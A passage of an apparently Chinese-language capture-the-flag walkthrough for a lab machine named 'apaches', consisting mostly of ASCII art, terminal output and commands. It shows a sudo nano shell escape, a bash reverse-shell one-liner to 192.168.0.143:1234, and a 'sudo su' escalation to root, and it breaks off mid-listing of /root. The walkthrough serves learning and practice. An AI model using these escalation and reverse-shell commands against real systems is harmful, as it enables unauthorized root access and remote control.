\n\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%,........@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@@@@%,,.*\/\/\/\/\/\/\/\/\/\/.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@\/,.  .*(\/\/***\/\/\/\/\/\/.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@%*.  , (\/\/\/\/. \/\/\/\/\/\/\/\/.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@,....#(\/\/\/\/\/*\/\/\/*\/\/\/\/..@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@%.\/* (%%(\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@#. *\/\/\/##%#(\/\/\/\/\/\/\/\/\/\/\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@* , #**\/####(\/*\/\/\/**,*,\/\/.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@#. . *..\/###%((\/\/\/\/,***,\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@(. ..,..(\/%%%##(\/\/\/\/\/\/\/\/\/%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@.,...\/.,,#\/\/\/\/\/\/\/*\/\/*,,...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@%.*.,.@*.,%#\/\/\/\/\/\/\/\/\/\/,......@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@%.,..... ,*#(\/\/\/\/\/\/\/\/\/,.,...... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@......#,,,,(*\/\/\/\/\/\/\/\/,,.,.........@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@ ..,(#*#\/*\/\/\/\/\/\/\/\/\/\/\/*%%#\/..........\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@\/(&#%\/\/\/\/\/\/\/\/\/\/\/\/\/\/#%&###((**\/\/\/,,..,...,.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@\/#(\/\/#@&&&&%###(#%(&##########(#*\/(\/\/\/(#(.,.,,,,,(,,%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@(%#\/\/\/\/\/\/\/\/\/((%&%&#\/\/\/*\/\/\/\/\/\/\/\/**%\/\/\/\/\/\/\/((,,,,,,,,,,,@%*,*&@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@%%(*\/\/\/\/\/\/\/\/\/\/%%\/((\/\/\/\/\/##(*(((%\/\/\/\/\/\/\/\/\/\/((*.,,,,,*******\/@#*,,%@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@&%#\/*%*%&*\/\/\/\/*\/&\/\/\/#(\/(.,\/\/\/\/(.#\/\/\/\/\/\/\/\/\/\/\/\/,,,,,*,**,*,*******%@%***%@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@%#**,.%\/*#\/%\/\/\/\/#(&*\/**(#*%#,#*(\/\/\/\/\/\/\/\/\/\/*\/\/..,,,,\/(,,**,****,**,,(@@%,,@@@@@@@@@@@@@@\n@@@@@@@@@@@@@\/\/*(*&&#*\/%\/\/(,.(**(&&,%(&,%##((,\/\/\/\/\/*\/*\/\/*\/,...,\/,,*,#,,,*,,,,,,,,,,,#@@@\/@@@@@@@@@@@\n@@@@@@@@@@@@@*&&%@&*##&*\/\/\/.(&\/( &* &&%%#((((((,\/*\/\/\/\/\/*\/\/\/,. ...,.,(,.(,,,,,,,,,,,,,,,,@@@@@@@@@@@@\n@@@@@@@@@@@@@\/%&&&&&&,@*%%@#,\/*&&%%%##(#\/\/\/\/\/@\/(..*\/\/\/\/\/\/\/\/\/.. .,....,..,..........,.....,@@@@@@@@@@\n@@@@@@@@@@@@@#*@@&&&&&&&&&&%%%%####((((((\/\/\/@((.  ,\/\/\/\/\/*\/\/\/,.. .......#....#...&...,. ...@@@@@@@@@@\n@@@@@@@@@@@@@%#\/&%%############(((((((\/\/\/\/\/%(\/......(\/\/\/\/\/\/\/\/ ... ...,........#...#., ....%@@@@@@@@@\n@@@@@@@@@@@@@#%(\/\/(#####(#######((((((\/(\/\/\/\/*...,....#\/\/\/\/\/\/\/*. ......*........ @...*,....(@@@@@@@@@\n@@@@@@@@@@@@@##\/\/\/\/(###########(#(((\/(\/\/\/((*....@...  #\/\/\/\/\/\/*.........,...  . ..#@.. \/# .(@@@@@@@@@\n@@@@@@@@@@@@@##\/(((\/\/%#######(###((((\/\/(@\/*...  %.... .#\/\/\/\/\/\/\/ ........ ... ......@@...@(&@@@@@@@@@\n@@@@@@@@\/\/**@%(\/\/\/\/%((%##########(((\/\/\/\/\/* .........\/...\/\/\/\/\/\/*,. ..,... .... .. ...\/@*..&@@@@@@@@@@\n@@@@@@@*@@@@@*,\/\/(\/,\/\/,.&########(((\/\/(\/\/\/......  .. ....*\/\/\/\/\/\/.........,...... ....*@@(@@@@@@@@@@@\n@@@@@@@@@@@@\/#\/\/\/\/%%#&\/,*@###(####(*\/\/\/\/*((.......... ...*#\/\/\/\/\/\/.......... ..*.. .....@@@@@@@@@@@@@\n@@@@@@@@((&\/,(\/\/\/*\/\/\/\/\/\/.(%@%%#(\/\/*\/((((((%%%,..(.. ......%\/\/\/\/\/\/*......,..... *...*.#@@@@@@@@@@@@@@\n@@@@@.@@@&@%#\/\/.(\/,&@@%%##(#(###(#((((((\/\/%%%((,*..&......*#\/\/\/\/\/\/......*. ....,...(@@@@@@@@@@@@@@@@\n@@@@@@@@@@\/#(\/\/\/\/\/@@@(&%########(#(((((\/(%%%%(\/\/\/*.*.,. ...*#\/\/\/\/\/*.,...*..*....@.@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@%#\/\/\/\/\/,@@@&@%####(#####(##(((#%%%%(\/((((\/.. . ...\/#\/\/\/\/\/,....* ., ...@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@\/%\/\/\/\/\/\/@@@%&&%########(##(##(#%%%%#\/\/(\/((((*.......*\/\/\/\/\/\/........*@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@(#\/\/*\/\/@@@@(&&&%###(###(####%&&%%%%#(\/((((((%*....  .*\/\/\/\/\/*...,(@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@&%\/*\/\/\/@@@@@(&&%&%#####((##%#&&%%%%((((((((((((*. .....*\/*\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@\/#\/\/*\/@@@@@@(&&&&%######(%%(&%%%%%\/#((((((((\/(((\/@@@@@@@@\/\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@%(\/\/*@@@@@@##&&&&&%######%@&%%#%%(%(((((((((((@((@@@@@@@@@*\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@\/%\/\/\/@@@@@@@%@@@@&&&&&%%#&&&##%%%(&(((((((((\/(\/@((*@@@@@@@@@*\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@#\/\/*@@@@@@@@@@@&@&&&&&(@@&####%%&&((((((((\/\/\/((@((*@@@@@@@@@@\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@(\/\/@@@@@@@@@%@@@@@&(@@&%######(%&((((((((((((((&((\/@@@@@@@@*(\/**\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@*\/\/\/*@@@@@@@@@@@@@@@&&&%%####(@&(((((((#((((((\/((((*@@@@@@@(\/\/\/*\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@%\/\/\/\/\/@@@@@@@&@@@@@&&&&%##%&@#((((#((((((((((((((((*@@@@@@@(\/*\/\/\/,@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@%\/\/(\/\/@@@@@@#%&@@@&&&&&(@&&%(#((#####((((((((\/(#(((\/@@@@@@@(*,\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@(#\/,@%\/@@@@@&@@@#@@#%&@&%((((#####(#(#(\/(%%%%%%%%%%(@@@@@@@\/\/@\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@*(\/@@%,@@@@@@@#&&&(&&((#%#########\/####%#%##%%%%%%%(@@@@@@@@@@\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@\/\/*,@@@@@@@@@@@&&&&&&&%%%#####(%%%%%#####(#(%%%%%%%(@@@@@@,,*,\/#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@%**\/**%@@@@@@@&&&&&&&%%###\/%%#%%%##\/##%###\/##%%%%%(@@@@@@@*\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@&,@@@@@@@@@#&&&&&&%%#%%#\/%%%####(\/#(*****,**(%&%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@%&&&&&%#&%@#.%####(*******\/*****\/*\/(%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@%&&&%%&%%*%%\/#(*************\/\/*\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@&&&&(&*,%##\/*\/**\/*\/\/\/\/\/*\/**\/\/\/\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@&&&%&\/%%#\/**\/\/\/\/\/\/*\/\/\/*\/\/*\/\/\/\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@(&(%,.(##\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/,\/\/\/((\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@&(%%(**((\/\/*\/\/\/\/\/\/\/\/\/\/\/*\/\/(((\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@(%#%***\/((\/\/\/*\/\/\/*\/\/\/\/***\/\/(\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@#@&&%*\/**#(\/\/\/\/\/\/*\/\/\/\/***,((@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@%&&%****%#(*\/\/**\/\/\/\/,***\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@(&%#***\/%#(\/\/\/***\/\/******,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@%&#\/**\/\/\/%\/\/\/**\/\/\/\/\/*******\/**@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@&%******\/#\/\/\/\/\/*\/\/\/\/****\/\/\/*\/\/(\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@&(*\/\/**#\/#(\/\/\/\/\/\/\/**\/**\/*#%%#(\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@((****\/%(\/*\/\/\/\/\/\/\/*%\/\/\/#%%%%%(\/(\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@#*\/\/\/(%%#(\/(((\/\/((\/(\/((%*%%%#(\/\/\/\/(*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@(\/(\/%*%%#(%\/(\/\/(\/\/(\/\/(%(*%\/%\/*\/\/\/\/(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@\/%*#%%%(\/%\/(\/(\/((\/\/(#*(\/\/\/\/\/((\/%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@(%%*%#(\/(%(\/\/\/\/\/\/(%%%%(\/\/\/(*%&#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@%%%%#(\/(\/((#\/\/(\/\/\/\/*%\/%#(\/##%%\/@\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@(%%%#(*#(((*(\/\/\/(\/(,*,@&%###\/(&\/(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@%@#\/\/@%%(\/\/\/\/\/(\/*\/\/*,\/%%#((#%\/%&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@%@@@@&%%%#%%%%*#*%&\/%&@#@&@\/(%%\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@&@@@&%%%%%%%\/%%&%&#,&*@(\/\/(%#%\/&%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@(\/@@&&%%%%\/\/&@@,*,@,*#@@@@(((\/(%%&(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@\/((%#\/((*%%&@@&\/,,@#\/@@@@@@%@@&%%%&**@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@%\/&&@&%%%%%(@@,@@\/&#@@@@@@@@@(%#((@#\/&&(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@%%%%#(\/((((@,*@@@@@@@@@@@@@@@#@@@%%%&%&(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@#@&\/\/\/%#*(\/@&#\/@@@@@@@@@@@@@@#@@@%%%%\/&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@&%%(\/%*\/%%(@&@@@@@@@@@@@@@@@@@&@@@%#%#%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@\/\/#&%#%%%(@@@@@@@*@@@@@@@@@@@@@@@@%%%(%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@#@@&%%#%%&@@@@@@@\/,@@@@@@@@@@@@@@&%%%#((@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@&@#\/\/\/#%%(@@@@@@&@@@@@@@@@@@@@%@%####\/%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@#%*&&##*\/(@@@@@@@@@@@@@@@@@@@%&&##((\/\/&%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@\/@@@@###%(@@@@@@@@@@@@@@@@@@@########%%%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@&@@@@@%#%#%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@%@@@@@%%##%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@#@@@@@%##%%%\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@#@@@@%#%####%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@%@@@%#@%###%%%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@%&%#%%%%%%%%%#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@#(((%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n\nYou are on fire, keep going!\npocahontas@apaches:~$ sudo -l\n[sudo] password for pocahontas: \nMatching Defaults entries for pocahontas on apaches:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser pocahontas may run the following commands on apaches:\n    (geronimo) \/bin\/nano<\/code><\/pre>\n
nano\u63d0\u6743<\/h3>\n
https:\/\/gtfobins.github.io\/gtfobins\/nano\/#sudo<\/a><\/p>\n
sudo nano\n^R^X\nreset; sh 1>&0 2>&0<\/code><\/pre>\n
sudo -u geronimo \/bin\/nano\nctrl + r,ctrl + x\nreset; sh 1>&0 2>&0<\/code><\/pre>\n
\"image-20240420140214334\"<\/div><\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h4>\n
$ sudo -l\nMatching Defaults entries for geronimo on apaches:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser geronimo may run the following commands on apaches:\n    (ALL : ALL) ALL\n    (ALL) NOPASSWD: ALL<\/code><\/pre>\n
\u7136\u540e\u6211\u4eec\u8f93\u5165bash -c 'exec bash -i &>\/dev\/tcp\/192.168.0.143\/1234 <&1'<\/code>\u53cd\u5f39\u8fc7\u6765\uff1a<\/p>\n
(remote) geronimo@apaches:\/home\/geronimo$ ls -la\ntotal 32\ndrwxr-xr-x 4 geronimo geronimo 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root     root     4096 Oct  9  2022 ..\n-rw------- 1 geronimo geronimo    0 Jul 13  2023 .bash_history\n-rw-r--r-- 1 geronimo geronimo  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 geronimo geronimo 3771 Feb 25  2020 .bashrc\ndrwx------ 2 geronimo geronimo 4096 Sep 30  2022 .cache\ndrwxrwxr-x 3 geronimo geronimo 4096 Oct 10  2022 .local\n-rw-r--r-- 1 geronimo geronimo  807 Feb 25  2020 .profile\n-rw-r--r-- 1 geronimo geronimo    0 Oct  1  2022 .sudo_as_admin_successful\n-rw------- 1 geronimo geronimo 3827 Oct 10  2022 user.txt\n(remote) geronimo@apaches:\/home\/geronimo$ cat user.txt \n\n  _____ _                      __                              _                 \n |  ___| | __ _  __ _    ___  \/ _|   __ _  ___ _ __ ___  _ __ (_)_ __ ___   ___  \n | |_  | |\/ _` |\/ _` |  \/ _ \\| |_   \/ _` |\/ _ \\ '__\/ _ \\| '_ \\| | '_ ` _ \\ \/ _ \\ \n |  _| | | (_| | (_| | | (_) |  _| | (_| |  __\/ | | (_) | | | | | | | | | | (_) |\n |_|   |_|\\__,_|\\__, |  \\___\/|_|    \\__, |\\___|_|  \\___\/|_| |_|_|_| |_| |_|\\___\/ \n                |___\/               |___\/                                        \n\n%&&&&&&&&&&&&&&&&&&&&&&&&&%&&&&&&&&&&%%%&&&&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%###(((\/\/\/\/\/\/\n&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%%%%%%&%%%%%%%%&%%#(%%%%%%%%%%%%%%%%%%%%%%%##((((((\/\/\/\n%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%%%%%##%%%%%%%%(\/**(%%#%%%%%%%%%%%%%%%%%%%%%%##(((((((\/\/\n&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%#*,\/%%%%((((\/%%%%*,\/%%%%%%%%%%%%%%%%%%%##((((((\/**\n&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%%%(%%\/\/\/\/*%%#((##((%%#*\/,,,#%%%%%%%%%%%%%%%%%#####((((\/\/\n&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%&%%%%#(%\/*\/\/\/*#(\/((#(((%#*\/,,,,#*,,(%%%%%%%%%%%%%%####((((((\n%&&&&&&&&&&&&&&&&&&&&&&&&%&%%%%%%(%(##,,**\/**#(((#%\/(%*\/*,,.,*\/,.,%%%%%%%%%%#(%%####((((\/\/\n%&&&&&&&&&&&&&&&&&&&&&&&&&%%%&%%(#\/(#\/,***\/**(#((((\/%*\/*.,,.,\/,..\/%%%%%%############(((\/(\/\n%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%((((\/(#,***(*,(#((#(*,**...,,*,...%%.,,.#####%####%###(((\/(\n%&&&&&&&&&&&&&&&&&&&&&&&&&&&&%&#((#\/&#(\/((#**\/##(%\/,,*....,,...,\/..,...#%%%%###%#%%###((((\n%&&&&&&&&&&&&&&&&&&&&&&&&&&&&%##((#(%#%%((%\/\/\/##((\/*\/*..,,,,...,**,.......(#####%#%%###(((\n&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%#\/#%(##%%#&#%\/\/\/%#%(\/\/,..,,,..*,.,,....,......,(##%%%%%##(((\n%&&&&&&&&&&&&&&&&&&&&&&&&&&%%%((((%%(&%%&&&(%#%%%#%\/#*#(\/..........,.......#%%#########(((\n&&&&&&&&&&&&&&&&&&&&&&&&&&&%%%\/#\/#%%%%&&&%&%%#%%%#%#*(#%(,#*.............\/#*\/##%#%%##(##((\n&&&&&&&&&&&&&&&&&&&&&&&%&&&%%%#\/##%%&&&%%%%%(\/*#.*\/,.,.#*(%\/,,#...........(%%%%#####((((((\n%&&&&&&&&&&&&&&&&&&&&&&&&&&&%%%(\/#&&%%\/,(\/\/,(*,\/,\/(.,,\/..,*\/(#(..#......\/#%%%#######((((((\n%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&#*(%%&%,#\/*((,(\/\/,\/\/***(..*..,,#*#(((*..((.,%%%%###(((((((((\n%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%%(%&(%\/#\/,%%%%%%%%%#%#(#\/*,..#.,*\/\/\/....*###(#######((((((#\n%&&&&&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%\/(%%%%..\/###((*#\/.....,,,..\/(***.((##((((((###(((((((((\n%%&&&&&&&&&&&&&&&&&&&&&&&&%&&%%%%%%%#..*,((,\/....\/..........**(\/\/,.\/##%%#####((\/(((\/\/((###\n%%&&&&&&&&&&&&&&&&&&&&&&&%%%&%%%%%%\/,.,,##(%#,,,(#,.,...,...,**\/\/\/*(###%%##(((((((\/\/*\/(#((\n#%%%%&&&&&&&&&&&&&&&&&&%&%%%%%%%%%(,..,,(%%((#%%%#,..,\/*,....,.......(#######(((\/\/\/\/((##((\n%%%%%%%&&&&&&&&&&&&&&&&&%%%%%%%%%#(..*..,,,\/*..,\/*....,.....,,\/##\/,..\/####((((((\/\/\/\/\/((##(\n%%%%%%%%%%&&&&&&&&&&%%%%&%%%%%%%%##.....**(\/*(#(\/,..........,*,(%%######(((\/\/\/((\/\/\/\/((##(\/\n%%%%%%%%%&%&&%&&&&%&&&%%%%%%%%%%%%#,..\/\/,\/\/(*##((*..........\/,#\/(%%%#%##\/\/\/\/\/\/\/\/\/\/\/((##((\/\n%%%%%%%%&%&&&&&%&&%&&%&%%%%%%%%%##,#......*,*\/((\/,.........,(,.(\/##%%%#((\/\/*\/\/\/\/\/\/\/((##(\/\/\n%%%%%%%%%&&&&%%%&&&%%%%%%%%%%%%#(\/(%**((....*(.............*#*,\/((#####(\/\/\/\/\/\/\/\/\/((####(\/\/\n%%%%%%%%%%%%%%&%%&&&%%%#%(#%%%#(((#%\/.\/..,.#\/.(\/(..,*,.....(#\/...,,*((#((\/\/*\/\/\/\/\/((###(\/\/\/\n#%%%%%%%%%%%%&&%%%%%*%%#&*#%%%(\/\/#%%...#,,*\/**,,,...(((,..,#\/(.,,**\/\/*\/,\/\/\/\/\/\/\/\/\/((###(\/\/\/\n(#%%%%%%%%%%%%%%%%%&(*#((\/(((\/*,#%%#.,.,,%\/\/((%#\/,......,#%#((.,*\/\/\/(\/\/((\/\/\/\/\/\/\/\/(((((\/\/\/(\n(##%#%%%%%%%%%%##%%%%\/,%(\/,(*,,,%%#%#..,**\/((\/(*,,...,,,,,,(#(,,**(((((((\/((\/\/\/\/((((((\/*((\n*(#%##%%%%%%%%%##%((%(.*%**\/(..(%%%%#..,*(\/\/(\/*,,,...,.,,,*%(((***\/(((#%(,(\/##(((((((\/\/\/\/(\n\/(###%%%%%%%%%###*#%%#(\/#,#,,((%%%%%#\/..*\/\/\/\/\/*,*,..,,,,,**####\/*\/(((%##(*(#%,((\/((\/\/\/\/\/(#\n\/(##%%#%%%%%%#%,(%%%##(,\/\/,*(*\/%&%%\/%#..*\/**\/\/*,*,,,,,,,,,\/(%%%\/\/((%,\/%%%\/,,\/#(((\/(\/\/\/\/#((\n*#(#(#####%#%#\/*%%%%(**(\/*(*((%&%%%%%#.,*(\/***,,**,\/,,,**(\/*\/(#*%\/*,%%(((\/\/(%#%#%(\/\/\/\/(#((\n*##((#######%(*####.*(\/\/\/,(*\/,&%%%%%%#.,,,**%,***%\/,,\/.**,*#%%(%(*\/,*,\/%#,(%%%%%((\/\/\/((#((\n\nAs long as you keep going, you'll keep getting better.<\/code><\/pre>\n
\u6211\u4eec\u5df2\u7ecf\u662fsudo\u7ec4\u7684\u4e86\uff0c\u5177\u6709root\u6743\u9650\uff01<\/p>\n
(remote) geronimo@apaches:\/home\/geronimo$ sudo su\nroot@apaches:\/home\/geronimo# cd \/root\nroot@apaches:~# ls -la\ntotal 40\ndrwx------  5 root root 4096 Jul 13  2023 .\ndrwxr-xr-x 20 root root 4096 Sep 30  2022 ..\n-rw-------  1 root root    0 Jul 13  2023 .bash_history\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\ndrwxr-xr-x  3 root root 4096 Oct  1  2022 .local\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\n-rw-rw----  1 root root 3675 Jul 13  2023 root.txt\n-rw-r--r--  1 root root   66 Oct 10  2022 .selected_editor\ndrwxr-xr-x  3 root root 4096 Sep 30  2022 snap\ndrwx------  2 root root 4096 